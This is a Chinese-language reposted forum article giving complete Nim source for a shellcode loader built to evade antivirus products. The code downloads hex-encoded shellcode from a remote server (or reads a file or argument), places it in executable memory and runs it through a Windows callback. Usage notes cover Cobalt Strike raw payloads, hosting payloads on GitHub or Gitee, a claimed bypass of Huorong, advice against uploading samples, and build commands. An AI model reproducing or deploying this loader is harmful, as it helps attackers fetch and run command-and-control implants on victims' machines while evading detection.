利用nim编写shellcode加载器bypass全家桶

Delina

原文链接：利用nim编写shellcode加载器bypass全家桶
​
首先本文首发在t00ls社区，作者shadowwolf

1. import httpclient
   
2. import streams
   
3. import os
   
4. import strutils
   
5. import winim/lean
   
6. import stew/byteutils
   
7. import net
   
8. proc shellcodeCallback(shellcode: openarray[byte]): void =
   
9.     echo "<li> T00ls.cc Nim-shellcode-loader shadowwolf"
   
10.     let CurrentProcess = GetCurrentProcessId()
    
11.     echo "<li> Target Process: ", CurrentProcess
    
12.     echo "<li> Length Of Shellcode: ", len(shellcode)
    
13.     echo "[+] Injecting!"
    
14.     discard """
    
15.     T00ls.cc 14454-shadowwolf
    
16.     """
    
17.     # Application for memory
    
18.     let rPtr = VirtualAlloc(
    
19.         nil,
    
20.         cast[SIZE_T](shellcode.len),
    
21.         MEM_COMMIT,
    
22.         PAGE_EXECUTE_READ_WRITE
    
23.     )
    
24. 
    
25.     # Copy Shellcode to the allocated memory section
    
26.     copyMem(rPtr,unsafeAddr shellcode,cast[SIZE_T](shellcode.len))
    
27. 
    
28.     # Callback execution
    
29.     EnumSystemGeoID(
    
30.         16,
    
31.         0,
    
32.         cast[GEO_ENUMPROC](rPtr)
    
33.     )
    
34. proc RequestGet(url:string,header={"user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"}):string=
    
35.      type
    
36.         sslContext=ref object
    
37.      var
    
38.         client = newHttpClient(sslContext=newContext(verifyMode=CVerifyNone))
    
39.         RequestHeaders=newHttpHeaders(header)
    
40.         resp=client.request(url,headers=RequestHeaders)
    
41.      return resp.bodyStream.readAll().replace("\\x"," ").replace(",","").replace(" ","")
    
42. #To get the shellcode on the website you put on
    
43. proc GetShellcodeAndRun(para:string):void=
    
44.     if("http" in para):
    
45.        echo "<li> Get the shellcode on the website:"¶
    
46.        let resp=RequestGet(para)#Get the shellcode on your website
    
47.        var shellcode = newSeq[byte](len(resp) div 2)#calc the length
    
48.        hexToByteArray(resp, shellcode)#convert hex string into array
    
49.        shellcodeCallback(shellcode)#execute
    
50.     elif fileExists(para):
    
51.         echo "<li> Get the file:"¶
    
52.         var
    
53.             filename = para
    
54.             file: File
    
55.         file = open(filename, fmRead)
    
56.         var fileSize = file.getFileSize()
    
57.         var shellcode = newSeq[byte](fileSize)
    
58.         discard file.readBytes(shellcode, 0, fileSize)
    
59.         file.close()
    
60.         shellcodeCallback(shellcode)
    
61.     else:
    
62.         echo "<li> Get the string:"¶
    
63.         var hexstr: string = para
    
64.         var shellcode = newSeq[byte](len(hexstr) div 2)
    
65.         hexToByteArray(hexstr, shellcode)
    
66.         shellcodeCallback(shellcode)
    
67. if paramCount()>=1:
    
68.    var para:string=paramStr(1)
    
69.    GetShellcodeAndRun(para)

复制代码

使用方法①可payload直接键入上线注意:除了加载bin文件是不用额外操作之外 其他的加载方式都需要把payload中的\x删去

​

②可加载bin文件上线
即cs里面生成的raw

​

③可请求远程服务器获取payload

​

也可以请求github/gitee获取payload

​

注意:放在远程服务器上的必须是去掉\x的 如图所示:

​

1. 查杀情况
   
2. 过火绒，360全家桶没有试过 要试的哥哥不要开上传样本 谢谢啦
   
3. 1.先装所需的库 nimble install https://gitee.com/oagi/winim.git
   
4. 2.编译生成exe: nim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nim

复制代码